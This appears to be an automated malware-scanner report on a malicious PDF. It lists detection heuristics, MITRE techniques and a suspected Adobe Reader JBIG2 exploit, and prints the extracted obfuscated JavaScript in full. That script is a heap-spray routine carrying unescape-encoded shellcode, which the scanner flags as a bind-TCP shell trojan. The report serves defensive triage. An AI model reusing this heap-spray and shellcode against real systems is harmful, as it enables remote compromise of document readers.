MALICIOUS
466
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 JavaScript/JScript
T1566.001 Phishing: Spearphishing Attachment
T1204.002 Malicious File: Malicious Attachment
The PDF contains obfuscated JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT', 'PDF_JS', and 'PDF_UNESCAPE'. The 'CLAMAV_DETECTION' heuristic further confirms its malicious nature. The embedded JavaScript stream, named 'javascript_obj0006_000.js', is the primary mechanism for delivering the malicious payload, likely by downloading and executing a second-stage artifact. The presence of JBIG2 decoding with active content suggests attempts to hide or embed malicious data within the PDF structure.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 9
-
Adobe Reader JBIG2Decode generic heap-spray exploit critical CVE likely CVE_2009_0658_GENERIC_SPRAYPDF combines JBIG2Decode image streams with JavaScript heap-spray or decoder scaffolding. This is likely CVE-2009-0658-family Adobe Reader JBIG2 exploitation, but it lacks the stricter Reader-9 version gate or decoded page-word shellcode fingerprint required by the exact rule.
-
JBIG2 + active content high PDF_JBIG2_ACTIVE_CONTENTJBIG2Decode appears with JavaScript/XFA/RichMedia — a related indicator for JBIG2 parser-exploit families including CVE-2021-30860 and CVE-2009-0658, but not a unique CVE fingerprint.
-
ClamAV: Heuristics.PDF.ObfuscatedNameObject critical CLAMAV_DETECTIONClamAV detected this file as malware: Heuristics.PDF.ObfuscatedNameObject
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
var deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA = ""; var FMDWrmNKVgiTxBMeeFBbwPsqPixaTOOIpavoutTQaDDuMYvOe = unescape("%u371d%u7799%u922c%u029b%u90d5%u8d15%u037a%ub9f9%uf821%u274a%u767b%ue128%u4e2d%ua9b2%u303f%ub8fd%u48b5%ub014%u4241%ubebb%u93ba%u2fa8%u4b7c%u9846%u7f96%ub94f%u7e7d%ud30a%uc0fe%u2de2%u4a76%u4379%u427b%u41bb%u9b8d%u4791%uf901%u462c%u734f%uf81b%u7f67%u1175%u1de1%u7096%ud408%u3915%ufdd0%u2b49%u29d5%u77e0%u2471%u3590%u7234%ub63c%uff22%uc7c6%uebc1%u3f3d%ub4bf%u9827%ufc18%u979f%ub5b7%ue33a%u7805%uf513%u0db1%u1c74%u9348%u9225%ub8b2%u33be … var DDdnbadCxyKd = ""; -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
JBIG2Decode filter medium PDF_JBIG2JBIG2 image decoder present — historically used in zero-click exploits
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0006_000.js |
pdf-javascript-stream | PDF /JS object 6 at offset 0x21D | 6093 bytes |
SHA-256: 93c80667bc73a57dd697cca4f540eb991e6d1cc7949ebe8e1c7ddbff40cb7ca2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 14 of 19 identifiers look randomly generated (e.g. 'FMDWrmNKVgiTxBMeeFBbwPsqPixaTOOIpavoutTQ') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ZCaFWqrbikUYucHGLeHAmmYZpcDlXWMt = "";
var deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA = "";
var FMDWrmNKVgiTxBMeeFBbwPsqPixaTOOIpavoutTQaDDuMYvOe = unescape("%u371d%u7799%u922c%u029b%u90d5%u8d15%u037a%ub9f9%uf821%u274a%u767b%ue128%u4e2d%ua9b2%u303f%ub8fd%u48b5%ub014%u4241%ubebb%u93ba%u2fa8%u4b7c%u9846%u7f96%ub94f%u7e7d%ud30a%uc0fe%u2de2%u4a76%u4379%u427b%u41bb%u9b8d%u4791%uf901%u462c%u734f%uf81b%u7f67%u1175%u1de1%u7096%ud408%u3915%ufdd0%u2b49%u29d5%u77e0%u2471%u3590%u7234%ub63c%uff22%uc7c6%uebc1%u3f3d%ub4bf%u9827%ufc18%u979f%ub5b7%ue33a%u7805%uf513%u0db1%u1c74%u9348%u9225%ub8b2%u33be%u4bd6%u4e99%ua9a8%u2f66%u7cba%ub337%u7a40%ub00c%u7f14%ub204%u2f7a%u3c7b%ub515%u79b4%ub725%uf90b%u83be%u70e1%u9f42%u663f%u4f46%ud18c%u77e0%u147d%u75b3%u2c7e%ua8a9%u911d%u0478%u4071%u9324%u81b9%ub6fc%u4774%u9299%u9690%ueb88%ufd1a%ue209%uba3d%uf786%u27e3%u734a%u4841%uf800%u4bb0%u8dbb%u9bbf%u9737%ud56b%u4e76%u351c%uf512%u3472%ub80c%ub198%ud42a%u4905%u7c2d%u670d%ud680%u4366%u7874%u727a%u7e14%u3c70%ub048%u9897%u49bf%ud284%u20e3%ub1f9%uf532%u9290%u189f%u71e1%u0473%u76b6%u6777%u057c%u0ca9%u40be%ub74e%ub2b4%u2947%u42e0%u4b25%u4115%u0bb8%u46fd%ud422%u37ba%u75b5%ub924%uc08c%uebd3%ub343%u7f35%u9927%u2a4f%u93d5%u3d2f%u7d7b%u793f%u090d%u6bf8%u4ad6%u349b%ue202%ua82d%u962c%u8dbb%ufc3b%u911d%u1c79%ua9b0%u7e7b%uc131%u74e1%u3071%ub1d5%u3d37%u9796%u767c%uf808%ub240%u27bf%u142c%u2473%u1a67%ud4f6%ub642%u1cba%u15b5%u1372%u77fd%u0c7d%u4648%u4375%ufc23%ud11b%u41e3%u0d05%ud211%u4ee2%u7a93%u0470%u9849%ube99%ueb39%ua834%ub835%u2178%u4be0%u919f%uf569%u4f2f%ubbb4%u3c92%u197f%u47d6%u1d9b%u2590%u3f66%ub78d%uf93a%u2db3%u737c%u7d7e%u4a7a%ua9b9%u8d92%u819f%u70e1%u4a78%ub414%u2515%u757f%u744f%ub134%u8091%u37e2%uf803%ub7b6%ubbb8%u98ba%ua8bf%u6679%ub01d%ue384%u3c71%u2c49%u0d90%uf585%ub31c%u7b4e%ub235%u9996%u2d93%u429b%ud433%u7776%u0a3d%u87d6%ue0f7%u4043%u974b%u67be%ueb00%u4172%u4724%u7946%ue132%u7c04%u8305%u89fd%u0ceb%ue086%u763f%u8848%ub5d5%u2075%u7ffc%u7427%uf912%u2f78%u77b9%u7a2c%ud52b%u72bf%u7e35%ub441%ue301%u7d34%u733f%u9f27%u49d4%ube47%u7b48%u4b15%ue291%ub62f%u9bf5%u42a8%u4a93%ub996%u0c71%u254e%u0546%u1070%u40f8%u8db0%u1c98%ud63d%ua94f%ub3b1%ud028%u1df9%u67ba%u0db7%u04bb%u3c97%ufd38%u1466%ufc24%u2d92%u90b5%u37b8%ub243%ufc99%u89e8%u0000%u6000%ue589%ud231%u8b64%u3052%u528b%u8b0c%u1452%u728b%u0f28%u4ab7%u3126%u31ff%uacc0%u613c%u027c%u202c%ucfc1%u010d%ue2c7%u52f0%u8b57%u1052%u428b%u013c%u8bd0%u7840%uc085%u4a74%ud001%u8b50%u1848%u588b%u0120%ue3d3%u493c%u348b%u018b%u31d6%u31ff%uacc0%ucfc1%u010d%u38c7%u75e0%u03f4%uf87d%u7d3b%u7524%u58e2%u588b%u0124%u66d3%u0c8b%u8b4b%u1c58%ud301%u048b%u018b%u89d0%u2444%u5b24%u615b%u5a59%uff51%u58e0%u5a5f%u128b%u86eb%u685d%u3233%u0000%u7768%u3273%u545f%u4c68%u2677%uff07%ub8d5%u0190%u0000%uc429%u5054%u2968%u6b80%uff00%u50d5%u5050%u4050%u4050%u6850%u0fea%ue0df%ud5ff%uc789%udb31%u6853%u0002%u5c11%ue689%u106a%u5756%uc268%u37db%uff67%u53d5%u6857%ue9b7%uff38%ud5ff%u5353%u6857%uec74%ue13b%ud5ff%u8957%u68c7%u6e75%u614d%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff");
var DDdnbadCxyKd = "";
for (OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL=128;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL>=0;--OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL) DDdnbadCxyKd += unescape("%u90f8%u4f99");
HZRAkneKP = DDdnbadCxyKd + FMDWrmNKVgiTxBMeeFBbwPsqPixaTOOIpavoutTQaDDuMYvOe;
CtbHanoruoDLCMInmHrbzYaYnxtJn = unescape("%u90f8%u4f99");
CWgMRJDQamXItZfXUhoXHRRYEp = 20;
cEnKaQLIbwklqRIyaDhJStyULMZEg = CWgMRJDQamXItZfXUhoXHRRYEp+HZRAkneKP.length
while (CtbHanoruoDLCMInmHrbzYaYnxtJn.length<cEnKaQLIbwklqRIyaDhJStyULMZEg) CtbHanoruoDLCMInmHrbzYaYnxtJn+=CtbHanoruoDLCMInmHrbzYaYnxtJn;
XXyEPTgfFqIURFgYspFYScOcXDVvpSOrnjlHzBdmqgnpAQJs = CtbHanoruoDLCMInmHrbzYaYnxtJn.substring(0, cEnKaQLIbwklqRIyaDhJStyULMZEg);
EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt = CtbHanoruoDLCMInmHrbzYaYnxtJn.substring(0, CtbHanoruoDLCMInmHrbzYaYnxtJn.length-cEnKaQLIbwklqRIyaDhJStyULMZEg);
while(EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt.length+cEnKaQLIbwklqRIyaDhJStyULMZEg < 0x40000) EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt = EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt+EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt+XXyEPTgfFqIURFgYspFYScOcXDVvpSOrnjlHzBdmqgnpAQJs;
qXClSbcmUjoemFDfDVexiqoAWFizUkIip = new Array();
for (OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL=0;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL<100;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL++) qXClSbcmUjoemFDfDVexiqoAWFizUkIip[OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL] = EDdwPsKesPmgrljXdiBuzTayFaIATefhopJcvQMkHBLmwpmt + HZRAkneKP;
for (OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL=142;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL>=0;--OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL) deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA += unescape("%ub550%u0166");
cfYNCPdLXFFzMjI = deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA.length + 20
while (deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA.length < cfYNCPdLXFFzMjI) deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA += deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA;
QJzm = deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA.substring(0, cfYNCPdLXFFzMjI);
AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY = deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA.substring(0, deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA.length-cfYNCPdLXFFzMjI);
while(AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY.length+cfYNCPdLXFFzMjI < 0x40000) AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY = AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY+AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY+QJzm;
EyfIwYbHicVNYbcWwEdrFTgiQMYvmwNk = new Array();
for (OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL=0;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL<125;OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL++) EyfIwYbHicVNYbcWwEdrFTgiQMYvmwNk[OWaveHZtuFjfiFvQRXpLMpIhLlXDzAXIrpwTiOBPrbPCL] = AjbeLzbEQSnJmwrHZnhztuGeloqvlyFOjUqY + deKJdpkSIMwFrnJgSYprPAhNOHbFYlupiLQwjFTLDA;
|
|||
javascript_obj0006_000_shellcode_00.bin |
pdf-js-shellcode | pdf-js-unescape-shellcode recovered from PDF /JS object 6 at offset 0x21D | 1024 bytes |
SHA-256: e3883ae638855511fce036a5ab18afcb9238db299c7428737e198bbbecd19580 |
|||
|
Detection
ClamAV:
Win.Trojan.ShellcodeBindTcp-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.